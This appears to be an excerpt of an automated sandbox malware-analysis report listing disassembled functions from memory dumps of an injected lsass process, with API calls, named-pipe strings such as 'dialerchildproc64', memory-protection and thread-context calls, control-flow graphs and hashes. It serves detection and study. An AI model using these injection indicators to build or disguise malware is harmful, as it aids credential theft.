                                                                                Function 00000140AE86CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 00000140AE86CE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEBC
                                                                                • SetLastError.KERNEL32 ref: 00000140AE86CED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,00000140AE86ECCC,?,?,?,?,00000140AE86BF9F,?,?,?,?,?,00000140AE867AB0), ref: 00000140AE86CF2C
                                                                                  • Part of subcall function 00000140AE86D6CC: HeapAlloc.KERNEL32 ref: 00000140AE86D721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF54
                                                                                  • Part of subcall function 00000140AE86D744: HeapFree.KERNEL32 ref: 00000140AE86D75A
                                                                                  • Part of subcall function 00000140AE86D744: GetLastError.KERNEL32 ref: 00000140AE86D764
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF76
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: b2b40885048b18a77dd749f130d094d7928ae544b3603784d23cb63539606b23
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: 0941183028174441FA6BAB6799553E922926B5C7B0F744B24AF3E4B6F6DE789C01C2C3
                                                                                Function 00000140AE862244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: d526e0782f541ea269add2dfc30b9375b8e19e2713657146a865421fd34f2e67
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: FB213936654B40C2EB11CB26E54839A77A1F789BA4F600215EF5D03BB8CF3CC949CB41
                                                                                Function 00000140AE86A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 705 140ae86a544-140ae86a5ac call 140ae86b414 708 140ae86a5b2-140ae86a5b5 705->708 709 140ae86aa13-140ae86aa1b call 140ae86c748 705->709 708->709 710 140ae86a5bb-140ae86a5c1 708->710 712 140ae86a5c7-140ae86a5cb 710->712 713 140ae86a690-140ae86a6a2 710->713 712->713 717 140ae86a5d1-140ae86a5dc 712->717 715 140ae86a963-140ae86a967 713->715 716 140ae86a6a8-140ae86a6ac 713->716 718 140ae86a9a0-140ae86a9aa call 140ae869634 715->718 719 140ae86a969-140ae86a970 715->719 716->715 720 140ae86a6b2-140ae86a6bd 716->720 717->713 721 140ae86a5e2-140ae86a5e7 717->721 718->709 731 140ae86a9ac-140ae86a9cb call 140ae867940 718->731 719->709 722 140ae86a976-140ae86a99b call 140ae86aa1c 719->722 720->715 724 140ae86a6c3-140ae86a6ca 720->724 721->713 725 140ae86a5ed-140ae86a5f7 call 140ae869634 721->725 722->718 728 140ae86a894-140ae86a8a0 724->728 729 140ae86a6d0-140ae86a707 call 140ae869a10 724->729 725->731 739 140ae86a5fd-140ae86a628 call 140ae869634 * 2 call 140ae869d24 725->739 728->718 732 140ae86a8a6-140ae86a8aa 728->732 729->728 744 140ae86a70d-140ae86a715 729->744 736 140ae86a8ac-140ae86a8b8 call 140ae869ce4 732->736 737 140ae86a8ba-140ae86a8c2 732->737 736->737 753 140ae86a8db-140ae86a8e3 736->753 737->718 743 140ae86a8c8-140ae86a8d5 call 140ae8698b4 737->743 773 140ae86a62a-140ae86a62e 739->773 774 140ae86a648-140ae86a652 call 140ae869634 739->774 743->718 743->753 745 140ae86a719-140ae86a74b 744->745 750 140ae86a887-140ae86a88e 745->750 751 140ae86a751-140ae86a75c 745->751 750->728 750->745 751->750 754 140ae86a762-140ae86a77b 751->754 755 140ae86a9f6-140ae86aa12 call 140ae869634 * 2 call 140ae86c6a8 753->755 756 140ae86a8e9-140ae86a8ed 753->756 758 140ae86a874-140ae86a879 754->758 759 140ae86a781-140ae86a7c6 call 140ae869cf8 * 2 754->759 755->709 760 140ae86a900 756->760 761 140ae86a8ef-140ae86a8fe call 140ae869ce4 756->761 764 140ae86a884 758->764 786 140ae86a804-140ae86a80a 759->786 787 140ae86a7c8-140ae86a7ee call 140ae869cf8 call 140ae86ac38 759->787 769 140ae86a903-140ae86a90d call 140ae86b4ac 760->769 761->769 764->750 769->718 784 140ae86a913-140ae86a961 call 140ae869944 call 140ae869b50 769->784 773->774 778 140ae86a630-140ae86a63b 773->778 774->713 790 140ae86a654-140ae86a674 call 140ae869634 * 2 call 140ae86b4ac 774->790 778->774 783 140ae86a63d-140ae86a642 778->783 783->709 783->774 784->718 794 140ae86a80c-140ae86a810 786->794 795 140ae86a87b 786->795 806 140ae86a815-140ae86a872 call 140ae86a470 787->806 807 140ae86a7f0-140ae86a802 787->807 811 140ae86a676-140ae86a680 call 140ae86b59c 790->811 812 140ae86a68b 790->812 794->759 796 140ae86a880 795->796 796->764 806->796 807->786 807->787 815 140ae86a686-140ae86a9ef call 140ae8692ac call 140ae86aff4 call 140ae8694a0 811->815 816 140ae86a9f0-140ae86a9f5 call 140ae86c6a8 811->816 812->713 815->816 816->755
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction ID: 7b4ba636362c0b5caa681dd8b7c7e919a21c7b74d1dcc59cd2284cb1c0ce2a62
                                                                                • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction Fuzzy Hash: 80E1B5726447408AEB62DF66D4803DD77A0F74DBA8F200156EF9D57BA9CB38C881D782
                                                                                Function 00000140ADFC9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 584 140adfc9944-140adfc99ac call 140adfca814 587 140adfc99b2-140adfc99b5 584->587 588 140adfc9e13-140adfc9e1b call 140adfcbb48 584->588 587->588 589 140adfc99bb-140adfc99c1 587->589 592 140adfc99c7-140adfc99cb 589->592 593 140adfc9a90-140adfc9aa2 589->593 592->593 596 140adfc99d1-140adfc99dc 592->596 594 140adfc9aa8-140adfc9aac 593->594 595 140adfc9d63-140adfc9d67 593->595 594->595 599 140adfc9ab2-140adfc9abd 594->599 597 140adfc9d69-140adfc9d70 595->597 598 140adfc9da0-140adfc9daa call 140adfc8a34 595->598 596->593 600 140adfc99e2-140adfc99e7 596->600 597->588 602 140adfc9d76-140adfc9d9b call 140adfc9e1c 597->602 598->588 612 140adfc9dac-140adfc9dcb call 140adfc6d40 598->612 599->595 604 140adfc9ac3-140adfc9aca 599->604 600->593 601 140adfc99ed-140adfc99f7 call 140adfc8a34 600->601 601->612 615 140adfc99fd-140adfc9a28 call 140adfc8a34 * 2 call 140adfc9124 601->615 602->598 605 140adfc9c94-140adfc9ca0 604->605 606 140adfc9ad0-140adfc9b07 call 140adfc8e10 604->606 605->598 613 140adfc9ca6-140adfc9caa 605->613 606->605 620 140adfc9b0d-140adfc9b15 606->620 617 140adfc9cac-140adfc9cb8 call 140adfc90e4 613->617 618 140adfc9cba-140adfc9cc2 613->618 652 140adfc9a48-140adfc9a52 call 140adfc8a34 615->652 653 140adfc9a2a-140adfc9a2e 615->653 617->618 628 140adfc9cdb-140adfc9ce3 617->628 618->598 619 140adfc9cc8-140adfc9cd5 call 140adfc8cb4 618->619 619->598 619->628 626 140adfc9b19-140adfc9b4b 620->626 630 140adfc9c87-140adfc9c8e 626->630 631 140adfc9b51-140adfc9b5c 626->631 633 140adfc9ce9-140adfc9ced 628->633 634 140adfc9df6-140adfc9e12 call 140adfc8a34 * 2 call 140adfcbaa8 628->634 630->605 630->626 631->630 635 140adfc9b62-140adfc9b7b 631->635 637 140adfc9cef-140adfc9cfe call 140adfc90e4 633->637 638 140adfc9d00 633->638 634->588 639 140adfc9c74-140adfc9c79 635->639 640 140adfc9b81-140adfc9bc6 call 140adfc90f8 * 2 635->640 648 140adfc9d03-140adfc9d0d call 140adfca8ac 637->648 638->648 644 140adfc9c84 639->644 666 140adfc9bc8-140adfc9bee call 140adfc90f8 call 140adfca038 640->666 667 140adfc9c04-140adfc9c0a 640->667 644->630 648->598 663 140adfc9d13-140adfc9d61 call 140adfc8d44 call 140adfc8f50 648->663 652->593 665 140adfc9a54-140adfc9a74 call 140adfc8a34 * 2 call 140adfca8ac 652->665 653->652 657 140adfc9a30-140adfc9a3b 653->657 657->652 662 140adfc9a3d-140adfc9a42 657->662 662->588 662->652 663->598 690 140adfc9a8b 665->690 691 140adfc9a76-140adfc9a80 call 140adfca99c 665->691 684 140adfc9c15-140adfc9c72 call 140adfc9870 666->684 685 140adfc9bf0-140adfc9c02 666->685 672 140adfc9c0c-140adfc9c10 667->672 673 140adfc9c7b 667->673 672->640 677 140adfc9c80 673->677 677->644 684->677 685->666 685->667 690->593 694 140adfc9a86-140adfc9def call 140adfc86ac call 140adfca3f4 call 140adfc88a0 691->694 695 140adfc9df0-140adfc9df5 call 140adfcbaa8 691->695 694->695 695->634
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: 610288a21bba7234f961b83c38f566fdeb512e40ac2c0f228fa86b943482e177
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: 21E1AE726247488BEB62DB26D4803DE37B3FB49B89F200115EF8957BA5DB34C1A2D700
                                                                                Function 00000140AE86F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction ID: 54f3c5caea9a3c542447f16078fc342d6fc1075fabbd0ba72b9af9b604dcfd33
                                                                                • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction Fuzzy Hash: 0A41AE32391B0082EB27CF17A9047D56391BB4DBB0F7945259E0E97BA4EE38CC45D392
                                                                                Function 00000140AE86104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: f351be34048a7ac2b0398fd5e5befab81f97ba1f80314118af7c8759807b7470
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: 54415B32614B84C6E761CF22E44439A77B1F389BA8F248129DF8D07B68DF38C849CB41
                                                                                Function 00000140AE86D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D087
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: 5fd4451407afae9fb266b5747a94aa354b26cb0abe68d3eef0f402a98e977e8e
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: D1114C3068434441FA6AAB275A513E962516B5C7F0F785B24AE3D076FEDE78DC02C683
                                                                                Function 00000140AE867510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 65cc65eb12478eed7e59dbe5af20ea895e9a9811b6e8982f7201964f625eb0cd
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: F2819F30A9034187FB53AB6798413D92292AB8D7B4F744525AF0C477B6EB3ACC45C7C2
                                                                                Function 00000140AE869DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction ID: 03dcf4635245ae701bcfc235362316d2ff68836874f11cf0347ec2092aff8e99
                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: 9F319031292B40E1EF239B47A4007D56394B74CBB0F7985259E2E4B7A0EF7DC845C392
                                                                                Function 00000140AE873DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: ad989254367ffea67bb77bf17bba7392694ea205673c5da45a75a0c92e4d569a
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: 82114932650B4086E7528B53A84439977A4B79CFF4F644224EF5E87BA5CF38C814C782
                                                                                Function 00000140AE863790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: fd890a10e18ff91e2345af510b04503e6d001258bbebb589a967ba1f92d71b91
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: 81113936B45B8182FF159B23E4082A972A0FB8CBA5F640029DF9D077A4EF3DC905C745
                                                                                Function 00000140AE865B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction ID: 4b8643210702c91202cb0783c5a391a2a26d50b369a2e2f855514301358eef3e
                                                                                • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction Fuzzy Hash: 98D19736248B8882DA719B0AE49439A77A0F78CB94F600516EF8D47BB5DF3CC941CB81
                                                                                Function 00000140AE862F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: a2d052cb6962f498e3cef9ed57c0a8daa6a62b61da821da8834fd8d960af75c0
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: D231B332741B5182EB26DF1BE5447A9A7A0FB4DBA4F2881209F4C47B75EF34C8A5C781
                                                                                Function 00000140AE86CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: b1e378f208745640ce80b78c559ffaa0a20b0e3a8eff5e4311b7b060cf634d78
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: F3112E3028534081FA66AB635A553A962416B9C7F4F344B24EE3E476FADE78DC01D6C3
                                                                                Function 00000140AE86199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 9022e9ca5b0b5f71c7b82a84b25e46de0569a46428ab685b711a92cff19137a4
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: A5015731740B4082EB51DB53A848799A3A1F78CBD1FA84035DF4D43B65DE38C989C781
                                                                                Function 00000140AE8636C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: 301de5e6a3bc59086d6f9150b82df67b6d6c22bbab0207dc7c03168e1951e1a1
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 01015774651B40C2EB269B23E81879973A0BB9DBA2F240428CF4D07774EF3CC908C782
                                                                                Function 00000140AE868FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction ID: bd338bf40550659d0ab490f789d63c081b601061abea68a920c6aca0165ba548
                                                                                • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction Fuzzy Hash: 8351A13265170086EB16CB16E848B9937A6F348BA8F318524DF1A477E8DB3DCC41C782
                                                                                Function 00000140AE863044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 0e89825c8f5d70b27a483a01b8d98a85527b4973c2a0efa788cb30948269fb2a
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: A6F05E30644B8082EB058B53B9041996261AB8CFE0F245020EF4E07B78DE38C849C782
                                                                                Function 00000140AE86BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
